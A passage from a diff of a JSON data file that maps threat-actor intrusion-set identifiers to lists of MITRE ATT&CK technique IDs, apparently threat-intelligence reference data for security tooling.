"attack.t1560.001" + }, + { + "mitreAttackId": "attack.t1016" + }, + { + "mitreAttackId": "attack.t1542.003" + }, + { + "mitreAttackId": "attack.t1218.011" + }, + { + "mitreAttackId": "attack.t1568.002" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1090" + }, + { + "mitreAttackId": "attack.t1059.003" + }, + { + "mitreAttackId": "attack.t1003.001" + }, + { + "mitreAttackId": "attack.t1059.004" + } + ], + "intrusion-set--0ec2f388-bf0f-4b5c-97b1-fc736d26c25f": [ + { + "mitreAttackId": "attack.t1041" + }, + { + "mitreAttackId": "attack.t1567.002" + }, + { + "mitreAttackId": "attack.t1071.003" + }, + { + "mitreAttackId": "attack.t1071.002" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1007" + }, + { + "mitreAttackId": "attack.t1584.001" + }, + { + "mitreAttackId": "attack.t1005" + }, + { + "mitreAttackId": "attack.t1583.006" + }, + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1583.004" + }, + { + "mitreAttackId": "attack.t1036.004" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1027.002" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1070.006" + }, + { + "mitreAttackId": "attack.t1040" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1055.012" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1583.001" + }, + { + "mitreAttackId": "attack.t1070.004" + }, + { + "mitreAttackId": "attack.t1036" + }, + { + "mitreAttackId": "attack.t1111" + }, + { + "mitreAttackId": "attack.t1112" + }, + { + "mitreAttackId": "attack.t1594" + }, + { + "mitreAttackId": "attack.t1591" + }, + { + "mitreAttackId": "attack.t1552.001" + }, + { + "mitreAttackId": "attack.t1564.002" + }, + { + "mitreAttackId": "attack.t1564.003" + }, + { + "mitreAttackId": "attack.t1557" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1136.001" + }, + { + "mitreAttackId": "attack.t1056.001" + }, + { + "mitreAttackId": "attack.t1550.002" + }, + { + "mitreAttackId": "attack.t1593.001" + }, + { + "mitreAttackId": "attack.t1608.001" + }, + { + "mitreAttackId": "attack.t1593.002" + }, + { + "mitreAttackId": "attack.t1589.002" + }, + { + "mitreAttackId": "attack.t1190" + }, + { + "mitreAttackId": "attack.t1589.003" + }, + { + "mitreAttackId": "attack.t1546.001" + }, + { + "mitreAttackId": "attack.t1587" + }, + { + "mitreAttackId": "attack.t1059.007" + }, + { + "mitreAttackId": "attack.t1562.001" + }, + { + "mitreAttackId": "attack.t1140" + }, + { + "mitreAttackId": "attack.t1588.005" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1562.004" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1074.001" + }, + { + "mitreAttackId": "attack.t1553.002" + }, + { + "mitreAttackId": "attack.t1587.001" + }, + { + "mitreAttackId": "attack.t1133" + }, + { + "mitreAttackId": "attack.t1012" + }, + { + "mitreAttackId": "attack.t1518.001" + }, + { + "mitreAttackId": "attack.t1505.003" + }, + { + "mitreAttackId": "attack.t1057" + }, + { + "mitreAttackId": "attack.t1102.002" + }, + { + "mitreAttackId": "attack.t1543.003" + }, + { + "mitreAttackId": "attack.t1098" + }, + { + "mitreAttackId": "attack.t1055" + }, + { + "mitreAttackId": "attack.t1176" + }, + { + "mitreAttackId": "attack.t1021.001" + }, + { + "mitreAttackId": "attack.t1078.003" + }, + { + "mitreAttackId": "attack.t1219" + }, + { + "mitreAttackId": "attack.t1586.002" + }, + { + "mitreAttackId": "attack.t1560.001" + }, + { + "mitreAttackId": "attack.t1218.005" + }, + { + "mitreAttackId": "attack.t1016" + }, + { + "mitreAttackId": "attack.t1534" + }, + { + "mitreAttackId": "attack.t1560.003" + }, + { + "mitreAttackId": "attack.t1585.001" + }, + { + "mitreAttackId": "attack.t1218.010" + }, + { + "mitreAttackId": "attack.t1585.002" + }, + { + "mitreAttackId": "attack.t1218.011" + }, + { + "mitreAttackId": "attack.t1114.003" + }, + { + "mitreAttackId": "attack.t1114.002" + }, + { + "mitreAttackId": "attack.t1555.003" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1598.003" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1059.006" + }, + { + "mitreAttackId": "attack.t1059.003" + }, + { + "mitreAttackId": "attack.t1003.001" + } + ], + "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192": [ + { + "mitreAttackId": "attack.t1047" + }, + { + "mitreAttackId": "attack.t1584.005" + }, + { + "mitreAttackId": "attack.t1485" + }, + { + "mitreAttackId": "attack.t1041" + }, + { + "mitreAttackId": "attack.t1592.002" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1049" + }, + { + "mitreAttackId": "attack.t1005" + }, + { + "mitreAttackId": "attack.t1203" + }, + { + "mitreAttackId": "attack.t1591.002" + }, + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1087.003" + }, + { + "mitreAttackId": "attack.t1583.004" + }, + { + "mitreAttackId": "attack.t1087.002" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1027.002" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1040" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1583.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1070.004" + }, + { + "mitreAttackId": "attack.t1078" + }, + { + "mitreAttackId": "attack.t1199" + }, + { + "mitreAttackId": "attack.t1593" + }, + { + "mitreAttackId": "attack.t1033" + }, + { + "mitreAttackId": "attack.t1594" + }, + { + "mitreAttackId": "attack.t1595.002" + }, + { + "mitreAttackId": "attack.t1110.003" + }, + { + "mitreAttackId": "attack.t1136.002" + }, + { + "mitreAttackId": "attack.t1056.001" + }, + { + "mitreAttackId": "attack.t1195.002" + }, + { + "mitreAttackId": "attack.t1588.006" + }, + { + "mitreAttackId": "attack.t1589.002" + }, + { + "mitreAttackId": "attack.t1589.003" + }, + { + "mitreAttackId": "attack.t1140" + }, + { + "mitreAttackId": "attack.t1562.002" + }, + { + "mitreAttackId": "attack.t1491.002" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1561.002" + }, + { + "mitreAttackId": "attack.t1587.001" + }, + { + "mitreAttackId": "attack.t1499" + }, + { + "mitreAttackId": "attack.t1136" + }, + { + "mitreAttackId": "attack.t1505.001" + }, + { + "mitreAttackId": "attack.t1133" + }, + { + "mitreAttackId": "attack.t1505.003" + }, + { + "mitreAttackId": "attack.t1098" + }, + { + "mitreAttackId": "attack.t1102.002" + }, + { + "mitreAttackId": "attack.t1571" + }, + { + "mitreAttackId": "attack.t1590.001" + }, + { + "mitreAttackId": "attack.t1021.002" + }, + { + "mitreAttackId": "attack.t1078.002" + }, + { + "mitreAttackId": "attack.t1570" + }, + { + "mitreAttackId": "attack.t1132.001" + }, + { + "mitreAttackId": "attack.t1219" + }, + { + "mitreAttackId": "attack.t1018" + }, + { + "mitreAttackId": "attack.t1016" + }, + { + "mitreAttackId": "attack.t1585.001" + }, + { + "mitreAttackId": "attack.t1585.002" + }, + { + "mitreAttackId": "attack.t1218.011" + }, + { + "mitreAttackId": "attack.t1555.003" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1598.003" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1090" + }, + { + "mitreAttackId": "attack.t1059.003" + }, + { + "mitreAttackId": "attack.t1003.001" + } + ], + "intrusion-set--96e239be-ad99-49eb-b127-3007b8c1bec9": [ + { + "mitreAttackId": "attack.t1542.002" + }, + { + "mitreAttackId": "attack.t1120" + }, + { + "mitreAttackId": "attack.t1480.001" + }, + { + "mitreAttackId": "attack.t1109" + }, + { + "mitreAttackId": "attack.t1564.005" + } + ], + "intrusion-set--8c1f0187-0826-4320-bddc-5f326cfcfe2c": [ + { + "mitreAttackId": "attack.t1124" + }, + { + "mitreAttackId": "attack.t1047" + }, + { + "mitreAttackId": "attack.t1201" + }, + { + "mitreAttackId": "attack.t1070.001" + }, + { + "mitreAttackId": "attack.t1046" + }, + { + "mitreAttackId": "attack.t1041" + }, + { + "mitreAttackId": "attack.t1567.002" + }, + { + "mitreAttackId": "attack.t1482" + }, + { + "mitreAttackId": "attack.t1071.004" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1007" + }, + { + "mitreAttackId": "attack.t1049" + }, + { + "mitreAttackId": "attack.t1087.001" + }, + { + "mitreAttackId": "attack.t1087.002" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1070.006" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1574.002" + }, + { + "mitreAttackId": "attack.t1213.002" + }, + { + "mitreAttackId": "attack.t1070.004" + }, + { + "mitreAttackId": "attack.t1078" + }, + { + "mitreAttackId": "attack.t1111" + }, + { + "mitreAttackId": "attack.t1033" + }, + { + "mitreAttackId": "attack.t1119" + }, + { + "mitreAttackId": "attack.t1069.001" + }, + { + "mitreAttackId": "attack.t1110.003" + }, + { + "mitreAttackId": "attack.t1110.004" + }, + { + "mitreAttackId": "attack.t1039" + }, + { + "mitreAttackId": "attack.t1550.002" + }, + { + "mitreAttackId": "attack.t1589.001" + }, + { + "mitreAttackId": "attack.t1106" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1074.002" + }, + { + "mitreAttackId": "attack.t1074.001" + }, + { + "mitreAttackId": "attack.t1135" + }, + { + "mitreAttackId": "attack.t1133" + }, + { + "mitreAttackId": "attack.t1012" + }, + { + "mitreAttackId": "attack.t1057" + }, + { + "mitreAttackId": "attack.t1021.002" + }, + { + "mitreAttackId": "attack.t1572" + }, + { + "mitreAttackId": "attack.t1078.002" + }, + { + "mitreAttackId": "attack.t1021.001" + }, + { + "mitreAttackId": "attack.t1570" + }, + { + "mitreAttackId": "attack.t1021.006" + }, + { + "mitreAttackId": "attack.t1569.002" + }, + { + "mitreAttackId": "attack.t1556.001" + }, + { + "mitreAttackId": "attack.t1018" + }, + { + "mitreAttackId": "attack.t1217" + }, + { + "mitreAttackId": "attack.t1560.001" + }, + { + "mitreAttackId": "attack.t1016" + }, + { + "mitreAttackId": "attack.t1114.002" + }, + { + "mitreAttackId": "attack.t1114.001" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1003.003" + }, + { + "mitreAttackId": "attack.t1059.003" + } + ], + "intrusion-set--8f5e8dc7-739d-4f5e-a8a1-a66e004d7063": [ + { + "mitreAttackId": "attack.t1585.001" + }, + { + "mitreAttackId": "attack.t1557.002" + }, + { + "mitreAttackId": "attack.t1587.001" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1003.001" + } + ], + "intrusion-set--c416b28c-103b-4df1-909e-78089a7e0e5f": [ + { + "mitreAttackId": "attack.t1189" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1102.001" + }, + { + "mitreAttackId": "attack.t1219" + }, + { + "mitreAttackId": "attack.t1574.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1547.001" + } + ], + "intrusion-set--88489675-d216-4884-a98f-49a89fcc1643": [ + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1027" + } + ], + "intrusion-set--dc5e2999-ca1a-47d4-8d12-a6984b138a1b": [ + { + "mitreAttackId": "attack.t1047" + }, + { + "mitreAttackId": "attack.t1087" + }, + { + "mitreAttackId": "attack.t1482" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1568" + }, + { + "mitreAttackId": "attack.t1584.001" + }, + { + "mitreAttackId": "attack.t1005" + }, + { + "mitreAttackId": "attack.t1036.004" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1606.002" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1606.001" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1070.006" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1583.001" + }, + { + "mitreAttackId": "attack.t1070.004" + }, + { + "mitreAttackId": "attack.t1036" + }, + { + "mitreAttackId": "attack.t1078" + }, + { + "mitreAttackId": "attack.t1552.004" + }, + { + "mitreAttackId": "attack.t1484.002" + }, + { + "mitreAttackId": "attack.t1550" + }, + { + "mitreAttackId": "attack.t1555" + }, + { + "mitreAttackId": "attack.t1195.002" + }, + { + "mitreAttackId": "attack.t1558.003" + }, + { + "mitreAttackId": "attack.t1550.004" + }, + { + "mitreAttackId": "attack.t1070" + }, + { + "mitreAttackId": "attack.t1090.001" + }, + { + "mitreAttackId": "attack.t1546.003" + }, + { + "mitreAttackId": "attack.t1098.001" + }, + { + "mitreAttackId": "attack.t1190" + }, + { + "mitreAttackId": "attack.t1098.002" + }, + { + "mitreAttackId": "attack.t1069" + }, + { + "mitreAttackId": "attack.t1562.001" + }, + { + "mitreAttackId": "attack.t1140" + }, + { + "mitreAttackId": "attack.t1562.002" + }, + { + "mitreAttackId": "attack.t1562.004" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1074.002" + }, + { + "mitreAttackId": "attack.t1553.002" + }, + { + "mitreAttackId": "attack.t1587.001" + }, + { + "mitreAttackId": "attack.t1133" + }, + { + "mitreAttackId": "attack.t1057" + }, + { + "mitreAttackId": "attack.t1048.002" + }, + { + "mitreAttackId": "attack.t1021.006" + }, + { + "mitreAttackId": "attack.t1018" + }, + { + "mitreAttackId": "attack.t1560.001" + }, + { + "mitreAttackId": "attack.t1218.011" + }, + { + "mitreAttackId": "attack.t1114.002" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1003.006" + }, + { + "mitreAttackId": "attack.t1016.001" + }, + { + "mitreAttackId": "attack.t1059.003" + } + ], + "intrusion-set--00f67a77-86a4-4adf-be26-1a54fc713340": [ + { + "mitreAttackId": "attack.t1485" + }, + { + "mitreAttackId": "attack.t1070.001" + }, + { + "mitreAttackId": "attack.t1486" + }, + { + "mitreAttackId": "attack.t1189" + }, + { + "mitreAttackId": "attack.t1529" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1106" + }, + { + "mitreAttackId": "attack.t1562.003" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1005" + }, + { + "mitreAttackId": "attack.t1562.004" + }, + { + "mitreAttackId": "attack.t1049" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1561.002" + }, + { + "mitreAttackId": "attack.t1218.001" + }, + { + "mitreAttackId": "attack.t1027.002" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1053.003" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1070.006" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1070.004" + }, + { + "mitreAttackId": "attack.t1135" + }, + { + "mitreAttackId": "attack.t1518.001" + }, + { + "mitreAttackId": "attack.t1565.003" + }, + { + "mitreAttackId": "attack.t1057" + }, + { + "mitreAttackId": "attack.t1112" + }, + { + "mitreAttackId": "attack.t1505.003" + }, + { + "mitreAttackId": "attack.t1543.003" + }, + { + "mitreAttackId": "attack.t1565.001" + }, + { + "mitreAttackId": "attack.t1565.002" + }, + { + "mitreAttackId": "attack.t1033" + }, + { + "mitreAttackId": "attack.t1110" + }, + { + "mitreAttackId": "attack.t1569.002" + }, + { + "mitreAttackId": "attack.t1217" + }, + { + "mitreAttackId": "attack.t1115" + }, + { + "mitreAttackId": "attack.t1056.001" + }, + { + "mitreAttackId": "attack.t1218.011" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1059.003" + } + ], + "intrusion-set--d519164e-f5fa-4b8c-a1fb-cf0172ad0983": [ + { + "mitreAttackId": "attack.t1021.002" + }, + { + "mitreAttackId": "attack.t1078.002" + }, + { + "mitreAttackId": "attack.t1072" + }, + { + "mitreAttackId": "attack.t1059.003" + } + ], + "intrusion-set--90784c1e-4aba-40eb-9adf-7556235e6384": [ + { + "mitreAttackId": "attack.t1114" + }, + { + "mitreAttackId": "attack.t1078" + }, + { + "mitreAttackId": "attack.t1594" + }, + { + "mitreAttackId": "attack.t1588.004" + }, + { + "mitreAttackId": "attack.t1110.003" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1585.002" + }, + { + "mitreAttackId": "attack.t1114.003" + }, + { + "mitreAttackId": "attack.t1608.005" + }, + { + "mitreAttackId": "attack.t1598.003" + }, + { + "mitreAttackId": "attack.t1589.002" + }, + { + "mitreAttackId": "attack.t1583.001" + }, + { + "mitreAttackId": "attack.t1589.003" + } + ], + "intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1": [ + { + "mitreAttackId": "attack.t1584.004" + }, + { + "mitreAttackId": "attack.t1070.001" + }, + { + "mitreAttackId": "attack.t1560" + }, + { + "mitreAttackId": "attack.t1203" + }, + { + "mitreAttackId": "attack.t1005" + }, + { + "mitreAttackId": "attack.t1591.002" + }, + { + "mitreAttackId": "attack.t1583.003" + }, + { + "mitreAttackId": "attack.t1087.002" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1583.001" + }, + { + "mitreAttackId": "attack.t1070.004" + }, + { + "mitreAttackId": "attack.t1113" + }, + { + "mitreAttackId": "attack.t1036" + }, + { + "mitreAttackId": "attack.t1110.002" + }, + { + "mitreAttackId": "attack.t1078" + }, + { + "mitreAttackId": "attack.t1112" + }, + { + "mitreAttackId": "attack.t1595.002" + }, + { + "mitreAttackId": "attack.t1110" + }, + { + "mitreAttackId": "attack.t1033" + }, + { + "mitreAttackId": "attack.t1564.002" + }, + { + "mitreAttackId": "attack.t1069.002" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1136.001" + }, + { + "mitreAttackId": "attack.t1195.002" + }, + { + "mitreAttackId": "attack.t1608.004" + }, + { + "mitreAttackId": "attack.t1071" + }, + { + "mitreAttackId": "attack.t1190" + }, + { + "mitreAttackId": "attack.t1221" + }, + { + "mitreAttackId": "attack.t1189" + }, + { + "mitreAttackId": "attack.t1187" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1562.004" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1074.001" + }, + { + "mitreAttackId": "attack.t1135" + }, + { + "mitreAttackId": "attack.t1059" + }, + { + "mitreAttackId": "attack.t1210" + }, + { + "mitreAttackId": "attack.t1012" + }, + { + "mitreAttackId": "attack.t1133" + }, + { + "mitreAttackId": "attack.t1505.003" + }, + { + "mitreAttackId": "attack.t1098" + }, + { + "mitreAttackId": "attack.t1021.001" + }, + { + "mitreAttackId": "attack.t1018" + }, + { + "mitreAttackId": "attack.t1016" + }, + { + "mitreAttackId": "attack.t1114.002" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1003.004" + }, + { + "mitreAttackId": "attack.t1598.003" + }, + { + "mitreAttackId": "attack.t1003.002" + }, + { + "mitreAttackId": "attack.t1598.002" + }, + { + "mitreAttackId": "attack.t1003.003" + }, + { + "mitreAttackId": "attack.t1059.006" + }, + { + "mitreAttackId": "attack.t1059.003" + } + ], + "intrusion-set--c4d50cdf-87ce-407d-86d8-862883485842": [ + { + "mitreAttackId": "attack.t1036.004" + }, + { + "mitreAttackId": "attack.t1571" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1105" + } + ], + "intrusion-set--62a64fd3-aaf7-4d09-a375-d6f8bb118481": [ + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1203" + } + ], + "intrusion-set--efed95ba-d7e8-47ff-8c53-99c42426ee7c": [ + { + "mitreAttackId": "attack.t1036.004" + }, + { + "mitreAttackId": "attack.t1205.001" + }, + { + "mitreAttackId": "attack.t1189" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1543.003" + }, + { + "mitreAttackId": "attack.t1553.002" + }, + { + "mitreAttackId": "attack.t1078.003" + }, + { + "mitreAttackId": "attack.t1587.003" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1587.002" + } + ], + "intrusion-set--d13c8a7f-740b-4efa-a232-de7d6bb05321": [ + { + "mitreAttackId": "attack.t1125" + }, + { + "mitreAttackId": "attack.t1059.007" + }, + { + "mitreAttackId": "attack.t1106" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1218.001" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1553.002" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1070.004" + }, + { + "mitreAttackId": "attack.t1113" + }, + { + "mitreAttackId": "attack.t1078" + }, + { + "mitreAttackId": "attack.t1112" + }, + { + "mitreAttackId": "attack.t1571" + }, + { + "mitreAttackId": "attack.t1055" + }, + { + "mitreAttackId": "attack.t1021.001" + }, + { + "mitreAttackId": "attack.t1569.002" + }, + { + "mitreAttackId": "attack.t1018" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1072" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1090.002" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1059.003" + }, + { + "mitreAttackId": "attack.t1003.001" + } + ], + "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924": [ + { + "mitreAttackId": "attack.t1221" + }, + { + "mitreAttackId": "attack.t1046" + }, + { + "mitreAttackId": "attack.t1140" + }, + { + "mitreAttackId": "attack.t1020" + }, + { + "mitreAttackId": "attack.t1071.004" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1106" + }, + { + "mitreAttackId": "attack.t1049" + }, + { + "mitreAttackId": "attack.t1203" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1547.004" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1052.001" + }, + { + "mitreAttackId": "attack.t1027.003" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1574.002" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1070.004" + }, + { + "mitreAttackId": "attack.t1135" + }, + { + "mitreAttackId": "attack.t1573" + }, + { + "mitreAttackId": "attack.t1518.001" + }, + { + "mitreAttackId": "attack.t1505.003" + }, + { + "mitreAttackId": "attack.t1057" + }, + { + "mitreAttackId": "attack.t1543.003" + }, + { + "mitreAttackId": "attack.t1033" + }, + { + "mitreAttackId": "attack.t1078.003" + }, + { + "mitreAttackId": "attack.t1564.001" + }, + { + "mitreAttackId": "attack.t1518" + }, + { + "mitreAttackId": "attack.t1119" + }, + { + "mitreAttackId": "attack.t1132.001" + }, + { + "mitreAttackId": "attack.t1016" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1573.002" + }, + { + "mitreAttackId": "attack.t1055.001" + }, + { + "mitreAttackId": "attack.t1091" + }, + { + "mitreAttackId": "attack.t1059.003" + } + ], + "intrusion-set--d6e88e18-81e8-4709-82d8-973095da1e70": [ + { + "mitreAttackId": "attack.t1584.004" + } + ], + "intrusion-set--4e868dad-682d-4897-b8df-2dc98f46c68a": [ + { + "mitreAttackId": "attack.t1059" + }, + { + "mitreAttackId": "attack.t1189" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1518" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1090" + }, + { + "mitreAttackId": "attack.t1005" + } + ], + "intrusion-set--fbe9387f-34e6-4828-ac28-3080020c597b": [ + { + "mitreAttackId": "attack.t1078" + }, + { + "mitreAttackId": "attack.t1033" + }, + { + "mitreAttackId": "attack.t1021.001" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1078.003" + }, + { + "mitreAttackId": "attack.t1570" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1059.003" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1070.004" + } + ], + "intrusion-set--59140a2e-d117-4206-9b2c-2a8662bd9d46": [ + { + "mitreAttackId": "attack.t1032" + } + ], + "intrusion-set--6566aac9-dad8-4332-ae73-20c23bad7f02": [ + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1036.002" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1583.001" + }, + { + "mitreAttackId": "attack.t1588.002" + } + ], + "intrusion-set--2688b13e-8e71-405a-9c40-0dee94bddf87": [ + { + "mitreAttackId": "attack.t1590.005" + }, + { + "mitreAttackId": "attack.t1505.003" + }, + { + "mitreAttackId": "attack.t1592.004" + }, + { + "mitreAttackId": "attack.t1078.003" + }, + { + "mitreAttackId": "attack.t1567.002" + }, + { + "mitreAttackId": "attack.t1132.001" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1560.001" + }, + { + "mitreAttackId": "attack.t1136.002" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1583.006" + }, + { + "mitreAttackId": "attack.t1218.011" + }, + { + "mitreAttackId": "attack.t1583.003" + }, + { + "mitreAttackId": "attack.t1114.002" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1095" + }, + { + "mitreAttackId": "attack.t1590" + }, + { + "mitreAttackId": "attack.t1589.002" + }, + { + "mitreAttackId": "attack.t1003.003" + }, + { + "mitreAttackId": "attack.t1190" + }, + { + "mitreAttackId": "attack.t1003.001" + } + ], + "intrusion-set--1f0f9a14-11aa-49aa-9174-bcd0eaa979de": [ + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1059.007" + }, + { + "mitreAttackId": "attack.t1539" + }, + { + "mitreAttackId": "attack.t1497.001" + }, + { + "mitreAttackId": "attack.t1219" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1574.001" + }, + { + "mitreAttackId": "attack.t1555" + }, + { + "mitreAttackId": "attack.t1548.002" + }, + { + "mitreAttackId": "attack.t1070.004" + }, + { + "mitreAttackId": "attack.t1105" + } + ], + "intrusion-set--da49b9f1-ca99-443f-9728-0a074db66850": [ + { + "mitreAttackId": "attack.t1027" + } + ], + "intrusion-set--f047ee18-7985-4946-8bfb-4ed754d3a0dd": [ + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1204.002" + } + ], + "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad": [ 